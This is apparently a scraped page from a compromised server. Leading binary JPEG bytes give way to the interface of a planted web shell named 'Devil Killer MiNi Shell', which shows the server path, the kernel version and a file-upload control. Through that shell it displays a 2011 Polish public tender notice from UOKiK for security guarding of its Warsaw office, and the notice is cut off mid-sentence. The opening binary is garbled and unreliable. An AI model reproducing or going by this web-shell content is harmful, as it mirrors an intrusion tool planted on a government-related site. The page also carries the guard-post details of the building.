JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111202/410230-N-2011.html

<p class="kh_header"><b>Warszawa: Całodobowa ochrona osób i mienia w budynku biurowym przy Pl. Powstańców Warszawy 1 w Warszawie wraz z otoczeniem, ograniczonym jezdniami ulic: Boduena, Sienkiewicza, Moniuszki, Pl. Powstańców Warszawy.</b><br>
<b>Numer ogłoszenia: 410230 - 2011; data zamieszczenia: 02.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Ochrony Konkurencji i Konsumentów , Pl.  Powstańców Warszawy 1, 00-950 Warszawa, woj. mazowieckie, tel. 022 5560129, faks 022 8270843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uokik.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całodobowa ochrona osób i mienia w budynku biurowym przy Pl. Powstańców Warszawy 1 w Warszawie wraz z otoczeniem, ograniczonym jezdniami ulic: Boduena, Sienkiewicza, Moniuszki, Pl. Powstańców Warszawy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Całodobowa ochrona osób i mienia w budynku biurowym przy Pl. Powstańców Warszawy 1 w Warszawie z otoczeniem, ograniczonym jezdniami ulic: Boduena, Sienkiewicza, Moniuszki, Pl. Powstańców Warszawy, polegająca w szczególności na:
1.niedopuszczaniu na teren budynku osób nieupoważnionych,
2.prowadzeniu ewidencji interesantów i gości, 
3.obsłudze bramek: wykrywającej metale i antykradzieżowych,
4.kontrolowaniu przepustek materiałowych na przedmioty, materiały itp.,
                 wynoszone z   budynku,
5.obsłudze szatni i depozytu bagażu dla gości,  
6.wydawaniu i przyjmowaniu kluczy do pomieszczeń oraz prowadzeniu stosownej 
                  ewidencji,
7.natychmiastowym reagowaniu na wszelkie sygnały z instalacji alarmowych
zainstalowanych w budynku, zgodnie z procedurami  postępowania, określonymi 
w szczegółowych instrukcjach,
8.natychmiastowym podejmowaniu działań mających na celu minimalizację szkód
     powstałych w wyniku kradzieży, włamania, pożaru, awarii instalacji i urządzeń 
                  technicznych, klęsk żywiołowych i innych zdarzeń losowych,
9.obserwowaniu prawidłowości działania dźwigów, a w przypadku awarii dźwigu
                  natychmiastowym powiadomieniu konserwatora dźwigu i odpowiedniego
                  przedstawiciela Zamawiającego,
10.bieżącym nadzorowaniu wykorzystania dźwigów w głównej klatce schodowej 
                  wyłącznie do przewozu osób,
11.dokonywaniu obchodów wewnętrznych i zewnętrznych chronionego obiektu, ze 
                  szczególnym zwróceniem uwagi na bezpieczeństwo przeciwpożarowe, 
                  wystąpienie ewentualnych awarii, czy innych zagrożeń,
12.w sytuacjach szczególnych - ścisłej współpracy ze służbami publicznymi: 
                  Policją, Strażą Pożarną, Strażą Miejską, itp.,
13.wykonywaniu innych zadań związanych z bezpieczeństwem obiektu, zleconych
                  przez Zamawiającego,
14.natychmiastowym informowaniu upoważnionego przedstawiciela
                  Zamawiającego o awariach i wszelkich zdarzeniach, mających wpływ na stan
                  bezpieczeństwa chronionego obiektu,
15. codziennym składaniu pisemnego meldunku z przebiegu służby w Dzienniku
                  Wewnętrznej Służby Ochrony,
16. obsłudze stanowiska monitoringu TV przemysłowej,
17.przestrzeganiu zapisów zawartych w Regulaminie porządkowym na terenie 
                   budynku przy Placu Powstańców Warszawy 1 w Warszawie, w szczególności
                   zakazu  wnoszenia na teren budynku broni palnej,
18. wykonywaniu zadań zgodnie z Instrukcją postępowania w sytuacjach zagrożenia 
                  osób i mienia w budynku Urzędu Ochrony Konkurencji i Konsumentów.
19.wykonywaniu innych zadań związanych z bezpieczeństwem obiektu, zleconych
                  przez Zamawiającego.
Szczegółowy opis przedmiotu zamówienia, tj. rozmieszczenie posterunków, ich obsada oraz szczegółowy zakres czynności dla poszczególnych stanowisk jest określone w Instrukcji ochrony obiektu, stanowiącej, jako załącznik nr 1, integralną część istotnych postanowień umowy załączonych do niniejszej specyfikacji. Czas pracy na poszczególnych posterunkach określony został według ww. Instrukcji w rozliczeniu dobowym, w sposób następujący:

Nazwa posterunku	Ilość osobo-godzin na dobę - dni robocze	Ilość osobo-godzin na dobę - dni wolne od pracy
Dowódca ochrony	8	-
Posterunek nr 1	57	48
Posterunek nr 2	24	24
Posterunek nr 3	8	-
Posterunek nr 4	8,5	-

Wymagania dotyczące realizacji zamówienia: 
Ochronę obiektu będą sprawować pracownicy Wykonawcy:
- posiadający co najmniej średnie wykształcenie, 
- posiadający zdolność fizyczną i psychiczną do wykonywania pracy zmianowej                        w ochronie, poświadczoną aktualnym świadectwem lekarskim, z wykluczeniem osób                    w wieku powyżej 65 roku życia,
- posiadający nienaganną opinię,
- posiadający odpowiednią prezencję,
- posiadających poświadczenie bezpieczeństwa do klauzuli Zastrzeżone według przepisów ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U.                          Nr 182, poz. 1228),
- przeszkoleni w zakresie stosowania przepisów ustawy z dnia 22 sierpnia 1997 r. 
o ochronie osób i mienia (t.j. Dz. U. z 2005 r. Nr 145, poz. 1221 ze zm.) oraz rozporządzenia Rady Ministrów z dnia 18 listopada 1998 r. w sprawie szczegółowego trybu działań pracowników ochrony, podejmowanych wobec osób znajdujących się                  w granicach chronionych obiektów i obszarów (Dz. U. z 1998 r. Nr 144, poz. 933),
- ubrani w jednolite, estetyczne, czyste umundurowanie (granatowa marynarka żakiet, granatowe spodnie,spódnica, niebieska koszula, krawat) i odznaki służbowe (identyfikatory ze zdjęciem),
- zaopatrzeni w środki łączności zapewniające niezakłóconą łączność między posterunkami.
Wykonawca zapewni, aby:
- skład personalny pracowników ochrony był stały - w liczbie 20 pracowników, 
- pracownicy zostali przeszkoleni w zakresie stosowania przepisów ustawy z dnia                     22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2005 r. Nr 145, poz. 1221 ze zm.) oraz rozporządzenia Rady Ministrów z dnia 18 listopada 1998 r. w sprawie szczegółowego trybu działań pracowników ochrony, podejmowanych wobec osób znajdujących się w granicach chronionych obiektów i obszarów (Dz. U. z 1998 r.                    Nr 144, poz. 933),
- przynajmniej czterech pracowników ochrony zatrudnionych na dziennej zmianie posiadało licencję pracownika ochrony I° lub II°, na pozostałych zmianach przynajmniej jeden pracowników winien  posiadać licencję pracownika ochrony I° lub II°, 
- pracownik ochrony obsługujący stanowisko rejestracji gości posiadał umiejętność porozumiewania się w języku angielskim w stopniu komunikatywnym. Stanowisko może być obsługiwane zamiennie przez dwóch pracowników.
Wykonawca posiada sprzęt i częstotliwość radiową, która zapewni niezakłóconą łączność pomiędzy poszczególnymi posterunkami.
Wykonawca zapewni w czasie realizacji zamówienia skuteczne stosowanie systemu jakości,                     w tym procesów pozwalających na ciągłe doskonalenie tego systemu, zgodnie 
z wymaganiami określonymi w normie PN -EN ISO 9001:2008.
Wykonawca w przypadkach szczególnych będzie wspomagał pracowników ochrony budynku własnymi patrolami interwencyjnymi. 
Wykonawca zobowiązuje się do przestrzegania przepisów ustawy z dnia 29 sierpnia 1997 r. 
o ochronie danych osobowych (t.j. Dz. U. z 2002 r. Nr 101, poz. 926 ze zm.) w związku 
z faktem, że jego pracownicy będą mieć dostęp do danych osobowych pracowników Urzędu podczas wykonywania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających 
w rozumieniu art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 04.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium wnosi się przed upływem terminu składania ofert. 
Wadium wynosi 14 000,00 zł (słownie złotych: czternaście tysięcy 00,100).
Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo
   - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)      gwarancjach bankowych;
4)      gwarancjach ubezpieczeniowych;
5)    poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2
  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
  Przedsiębiorczości (t.j. z 2007 r. Dz. U. Nr 42, poz. 275 ze zm.).
Zamawiający przedstawia główne postanowienia, jakie powinny zawierać poręczenia lub gwarancje. Przedmiotem niniejszej gwarancji jest kwota wadium w wysokości ............ zł (słownie: ............... złotych), do wniesienia, którego zobowiązany jest ..........(nazwa Wykonawcy, w przypadku oferty wspólnej - Wykonawców składających ofertę wspólną), stający do postępowania o zamówienie publiczne na .................................... prowadzonego  w trybie przetargu nieograniczonego ogłoszonego w Biuletynie Zamówień Publicznych nr ...poz. ..... z dnia.......... przez Urząd Ochrony Konkurencji                i Konsumentów, Pl. Powstańców Warszawy 1, 00-950 Warszawa.
Niniejszym ................(nazwa Wykonawcy) gwarantuję, zapłatę na rzecz Urzędu Ochrony Konkurencji i Konsumentów, Pl. Powstańców Warszawy 1, 00-950 Warszawa, kwoty wadium, o której mowa wyżej, gdy Wykonawca:
1) odmówi podpisania umowy na warunkach określonych w ofercie,
2) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy na zasadach określonych w specyfikacji istotnych warunków zamówienia publicznego,
3)   zawarcie umowy stanie się niemożliwe z przyczyn leżących po mojej stronie;
4)  nie złoży w odpowiedzi na wezwanie dokumentów, oświadczeń lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie,
Gwarancja obowiązuje od dnia...... (termin składania ofert) do dnia..................(minimalnie termin upływu związania ofertą). Gwarant zobowiązuje się do wypłacenia Urzędowi Ochrony Konkurencji i Konsumentów, Pl. Powstańców Warszawy 1 , 00-950 Warszawa kwoty do wysokości określonej powyżej na pierwsze pisemne żądanie, bez konieczności uzasadnienia żądania przez Zamawiającego, o ile Zamawiający stwierdzi w swoim żądaniu, że kwota roszczenia jest mu należna                      w związku z zaistnieniem choćby jednego z wymienionych wyżej warunków                                  i wyszczególni zaistniały warunek lub warunki.
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek Zamawiającego:
            NBP OO Warszawa Nr 40 1010 1010 0078 7813 9120 0000.
Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania
rachunku Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać aktualną koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony
osób i mienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania wiedzy i doświadczenia, Wykonawca musi złożyć: 
Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również
wykonywanych usług w okresie trzech lat przed terminem składania ofert, a jeżeli 
okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzających 
wykonanie co najmniej trzech usług w zakresie świadczenia ochrony fizycznej osób 
i mienia w obiektach biurowych o powierzchni nie mniejszej niż 10 000 m2 przez min. 7 pracowników ochrony na jednej zmianie. Wykaz ma potwierdzać wielkość obiektu, ilość pracowników na zmianie oraz daty wykonania usługi i odbiorców. 
	Do powyższego wykazu Wykonawca musi dołączyć dokumenty potwierdzające, że usługi zostały wykonane należycie. Dokumenty muszą być wystawione przez Zamawiającego, odbiorcę usługi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia opisanego przez Zamawiającego warunku dysponowania
odpowiednim potencjałem technicznym, Wykonawca musi:
-posiadać własną częstotliwość radiową, 
-spełniać wymogi jakościowe w zakresie świadczenia usług ochrony osób                 i mienia zgodne z normą PN-EN ISO 9001:2008.
-dysponować pracownikami posiadającymi: licencję pracownika ochrony, poświadczenie bezpieczeństwa oznaczone klauzulą Zastrzeżone 
-posiadać niezbędny do wykonania zamówienia sprzęt i urządzenia zapewniające prawidłową realizację zamówienia (latarki, radiotelefony, telefony komórkowe, transport samochodowy itp.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponować min. 20 pracownikami posiadającymi zdolność fizyczną                              i psychiczną do wykonywania pracy zmianowej w ochronie, poświadczoną aktualnym świadectwem lekarskim, z wykluczeniem osób w wieku emerytalnym,
- 	dysponować min 4 pracownikami posiadającymi licencję pracownika ochrony I° lub II°, 
- 	dysponować min 2 pracownikami posiadającymi umiejętność porozumiewania się w języku angielskim w stopniu komunikatywnym. 
- 	posiadającymi poświadczenie bezpieczeństwa do klauzuli Zastrzeżone według 
przepisów ustawy o ochronie informacji niejawnych, oraz przeszkolonych                          w zakresie stosowania przepisów ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2005 r. Nr 145, poz. 1221 ze zm.) oraz rozporządzenia  Rady Ministrów z dnia 18 listopada 1998 r. w sprawie szczegółowego trybu działań pracowników ochrony, podejmowanych wobec osób znajdujących się               w granicach chronionych obiektów (Dz. U. z 1998 r. Nr 144, poz. 933),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku znajdowania się przez Wykonawcę w sytuacji 
ekonomicznej i finansowej należy przedstawić polisę, a w przypadku jej braku inny 
dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności
cywilnej w zakresie prowadzonej działalności w wysokości min. 4 000 000,00 zł. 
Ubezpieczenie powinno obejmować cały okres realizacji umowy, a jeżeli obejmuje okres krótszy wybrany Wykonawca będzie zobowiązany do przedłożenia ubezpieczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kserokopię dokumentów z Państwowej Inspekcji Radiofonii o przyznaniu Wykonawcy częstotliwości radiowej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonany zostanie wybór Wykonawcy.
Zmiany dotyczyć mogą następujących kwestii:

a)  osób wykonujących usługę ochrony ze strony Wykonawcy, osoby uprawnionej do
 kontaktu lub podpisania protokołu odbioru Zamawiającego lub Wykonawcy.
 Zmiana dokonana zostanie w przypadku zaistnienia okoliczności faktycznie
 obiektywnych, które uniemożliwiać będą konkretnej osobie wskazanej w umowie do 
 realizacji jej postanowień, np.: rozwiązanie umowy o pracę, choroba, śmierć
 pracownika, utrata uprawnień, itp., 
b)  stawki podatku VAT, zgodnie w powszechnie obowiązującymi przepisami prawa
       z uwzględnieniem zmiany w całościowym wynagrodzeniu Wykonawcy.
 Zmiana dokonana zostanie w przypadku zmiany powszechnie obowiązujących
 przepisów prawa w zakresie rozliczeń podatkowych i obowiązujących stawek
